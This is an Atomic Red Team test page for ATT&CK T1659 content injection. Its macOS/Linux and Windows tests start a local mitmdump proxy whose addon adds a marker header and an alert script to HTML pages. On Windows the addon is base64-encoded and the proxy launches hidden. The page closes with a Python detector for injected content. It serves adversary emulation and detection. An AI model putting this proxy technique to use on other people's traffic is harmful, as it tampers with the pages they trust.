# T1659 - Content Injection

## Description from ATT&CK

> Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)
>
> Adversaries may inject content to victim systems in various ways, including:
>
> * From the middle, where the adversary is in-between legitimate online client-server communications (**Note:** this is similar but distinct from [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557), which describes AiTM activity solely within an enterprise environment) (Citation: Kaspersky Encyclopedia MiTM)
> * From the side, where malicious content is injected and races to the client as a fake response to requests of a legitimate online server (Citation: Kaspersky ManOnTheSide)
>
> Content injection is often the result of compromised upstream communication channels, for example at the level of an internet service provider (ISP) as is the case with "lawful interception."(Citation: Kaspersky ManOnTheSide)(Citation: ESET MoustachedBouncer)(Citation: EFF China GitHub Attack)

[Source](https://attack.mitre.org/techniques/T1659)

## Atomic Tests

- [Atomic Test #1: MITM Proxy Injection](#atomic-test-1-mitm-proxy-injection)
- [Atomic Test #2: MITM Proxy Injection (Windows)](#atomic-test-2-mitm-proxy-injection-windows)

### Atomic Test #1: MITM Proxy Injection

Start mitmdump and verify the injected header and HTML content.

**Supported Platforms:** macOS, Linux

**auto_generated_guid:** `9b360eaf-c778-4f07-a6e7-895c4f01ac1c`

#### Attack Commands: Run with `bash`!

```bash
curl -skI --proxy http://127.0.0.1:8080 http://example.com > /tmp/curl_out.txt
grep "X-Atomic" /tmp/curl_out.txt || (cat /tmp/curl_out.txt && exit 1)
curl -sk --proxy http://127.0.0.1:8080 http://example.com > /tmp/atomic_t1659_page.html
grep -q "Atomic T1659 Injection" /tmp/atomic_t1659_page.html || (head -20 /tmp/atomic_t1659_page.html; exit 1)
```

#### Cleanup Commands

```bash
rm -rf /tmp/atomic_t1659_inject.py
rm -rf /tmp/atomic_t1659.log
rm -rf /tmp/curl_out.txt
rm -rf /tmp/atomic_t1659_page.html
pkill -f mitmdump || true
```

#### Dependencies: Run with `bash`!

##### Description: python3 must be installed

###### Check Prereq Commands

```bash
command -v python3
```

###### Get Prereq Commands

```bash
brew install python3 || (sudo apt-get update && sudo apt-get install -y python3) || sudo yum install -y python3
```

##### Description: curl must be installed

###### Check Prereq Commands

```bash
command -v curl
```

###### Get Prereq Commands

```bash
brew install curl || (sudo apt-get update && sudo apt-get install -y curl) || sudo yum install -y curl
```

##### Description: pipx must be installed

###### Check Prereq Commands

```bash
pipx --version
```

###### Get Prereq Commands

```bash
brew install pipx || (sudo apt-get update && sudo apt-get install -y pipx) || sudo yum install -y pipx
```

##### Description: mitmproxy must be installed

###### Check Prereq Commands

```bash
pipx list | grep mitmproxy
```

###### Get Prereq Commands

```bash
pipx install mitmproxy || brew install mitmproxy
```

##### Description: mitmdump must be running on port 8080

###### Check Prereq Commands

```bash
lsof -i tcp:8080 | grep mitmdump
```

###### Get Prereq Commands

```bash
# Write the mitmproxy addon: tag HTML responses with an X-Atomic header and append a marker script before </body>
printf "from mitmproxy import http\ndef response(flow: http.HTTPFlow):\n    if 'text/html' in flow.response.headers.get('content-type',''):\n        flow.response.headers['X-Atomic']='T1659'\n        flow.response.text = flow.response.text.replace('</body>', \"<script>alert('Atomic T1659 Injection')</script></body>\")" > /tmp/atomic_t1659_inject.py
($HOME/.local/bin/mitmdump -s /tmp/atomic_t1659_inject.py -p 8080 > /tmp/atomic_t1659.log 2>&1 &)
sleep 5
lsof -i tcp:8080 | grep mitmdump || (cat /tmp/atomic_t1659.log; exit 1)
```

### Atomic Test #2: MITM Proxy Injection (Windows)

Start the mitmdump proxy with the injection script in the background.

**Supported Platforms:** Windows

**auto_generated_guid:** `dcc2ca85-a21c-43a4-acc7-7314d4e5891c`

#### Attack Commands: Run with `powershell`!

```powershell
curl.exe -skI --proxy http://127.0.0.1:8080 http://example.com | Tee-Object -FilePath "$env:TEMP\curl_out.txt"
if (-not (Select-String -Path "$env:TEMP\curl_out.txt" -Pattern "X-Atomic")) { Write-Error "Header not found"; exit 1 }
$OutPath = "$env:TEMP\atomic_t1659_page.html"
curl.exe -sk --proxy http://127.0.0.1:8080 http://example.com | Out-File -FilePath $OutPath -Encoding utf8
$Content = Get-Content -Path $OutPath -Raw
if ($Content -notmatch "Atomic T1659 Injection") { exit 1 }
```

#### Cleanup Commands

```powershell
Stop-Process -Name "mitmdump" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_inject.py" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659.log" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\curl_out.txt" -ErrorAction SilentlyContinue
Remove-Item "$env:TEMP\atomic_t1659_page.html" -ErrorAction SilentlyContinue
```

#### Dependencies: Run with `powershell`!

##### Description: Python must be installed

###### Check Prereq Commands

```powershell
if (Get-Command python -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
winget install --id Python.Python.3 -e
```

##### Description: curl must be installed

###### Check Prereq Commands

```powershell
if (Get-Command curl.exe -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
winget install --id cURL.cURL -e
```

##### Description: mitmproxy must be installed and in PATH

###### Check Prereq Commands

```powershell
if (Get-Command mitmdump -ErrorAction SilentlyContinue) { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
python -m pip install mitmproxy
```

##### Description: mitmdump must be running on port 8080

###### Check Prereq Commands

```powershell
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { exit 1 }
```

###### Get Prereq Commands

```powershell
# Base64-encoded mitmproxy addon (same logic as the Linux test: add the X-Atomic header and the marker script to HTML responses)
$code = 'ZnJvbSBtaXRtcHJveHkgaW1wb3J0IGh0dHANCmRlZiByZXNwb25zZShmbG93OiBodHRwLkhUVFBGbG93KToNCiAgICBpZiAidGV4dC9odG1sIiBpbiBmbG93LnJlc3BvbnNlLmhlYWRlcnMuZ2V0KCJjb250ZW50LXR5cGUiLCIiKToNCiAgICAgICAgZmxvdy5yZXNwb25zZS5oZWFkZXJzWyJYLUF0b21pYyJdPSJUMTY1OSINCiAgICAgICAgZmxvdy5yZXNwb25zZS50ZXh0ID0gZmxvdy5yZXNwb25zZS50ZXh0LnJlcGxhY2UoIjwvYm9keT4iLCAiPHNjcmlwdD5hbGVydCgnQXRvbWljIFQxNjU5IEluamVjdGlvbicpPC9zY3JpcHQ+PC9ib2R5PiIp'
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($code)) | Out-File -FilePath "$env:TEMP\atomic_t1659_inject.py" -Encoding ascii
Start-Process -FilePath "mitmdump" -ArgumentList @("-s", "$env:TEMP\atomic_t1659_inject.py", "-p", "8080") -RedirectStandardOutput "$env:TEMP\atomic_t1659.log" -RedirectStandardError "$env:TEMP\atomic_t1659.log" -WindowStyle Hidden
Start-Sleep -Seconds 5
if (Get-NetTCPConnection -LocalPort 8080 -ErrorAction SilentlyContinue | Where-Object { (Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue).Name -like "*mitmdump*" }) { exit 0 } else { Get-Content "$env:TEMP\atomic_t1659.log"; exit 1 }
```
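Added example, not part of either Atomic test above: a defender-side check in Python that compares a response captured through a suspect path (such as the mitmdump proxy both tests start) against a baseline copy of the same page, and reports the artifacts the injection addon leaves behind: the added `X-Atomic` header, the changed `Content-Length`, and the `<script>` block inserted before `</body>`. The two sample responses are constructed inline, so it runs offline.

```python
"""Compare a baseline HTTP response with one fetched through a suspect path and
report injected headers and script blocks (added example, constructed samples)."""
import hashlib
import re

SCRIPT_RE = re.compile(rb"<script\b[^>]*>.*?</script>", re.IGNORECASE | re.DOTALL)

def parse_http_response(raw: bytes):
    """Split a raw HTTP/1.x response into (status line, {lower-cased header: value}, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    status, *header_lines = head.decode("iso-8859-1").split("\r\n")
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return status, headers, body

def diff_response(baseline: bytes, observed: bytes) -> dict:
    """Return the headers and <script> blocks present in observed but absent from baseline."""
    _, b_hdrs, b_body = parse_http_response(baseline)
    _, o_hdrs, o_body = parse_http_response(observed)
    baseline_scripts = set(SCRIPT_RE.findall(b_body))
    return {
        "body_modified": hashlib.sha256(b_body).digest() != hashlib.sha256(o_body).digest(),
        "added_headers": {k: v for k, v in o_hdrs.items() if k not in b_hdrs},
        "changed_headers": {k: (b_hdrs[k], v) for k, v in o_hdrs.items()
                            if k in b_hdrs and b_hdrs[k] != v},
        "injected_scripts": [s for s in SCRIPT_RE.findall(o_body) if s not in baseline_scripts],
    }

def injection_detected(baseline: bytes, observed: bytes) -> bool:
    """True when any injection signal (new header, new script, altered body) is present."""
    report = diff_response(baseline, observed)
    return bool(report["added_headers"] or report["injected_scripts"] or report["body_modified"])

def build_response(headers, body: bytes) -> bytes:
    """Assemble a constructed HTTP/1.1 200 response with a correct Content-Length."""
    lines = [b"HTTP/1.1 200 OK"] + [f"{k}: {v}".encode() for k, v in headers]
    lines.append(f"Content-Length: {len(body)}".encode())
    return b"\r\n".join(lines) + b"\r\n\r\n" + body

# Constructed samples: a clean page, and the same page after the test's proxy addon ran.
CLEAN_BODY = b"<html><head><title>Example</title></head><body><p>Hello</p></body></html>"
INJECTED_BODY = CLEAN_BODY.replace(
    b"</body>", b"<script>alert('Atomic T1659 Injection')</script></body>")
BASELINE = build_response([("Content-Type", "text/html; charset=UTF-8")], CLEAN_BODY)
OBSERVED = build_response(
    [("Content-Type", "text/html; charset=UTF-8"), ("X-Atomic", "T1659")], INJECTED_BODY)
```

Calling `diff_response(BASELINE, OBSERVED)` returns the `x-atomic` header, the changed `content-length`, and the single injected script block; the same comparison can be run against a curl capture saved with `-i` (headers plus body) in place of the constructed `OBSERVED`.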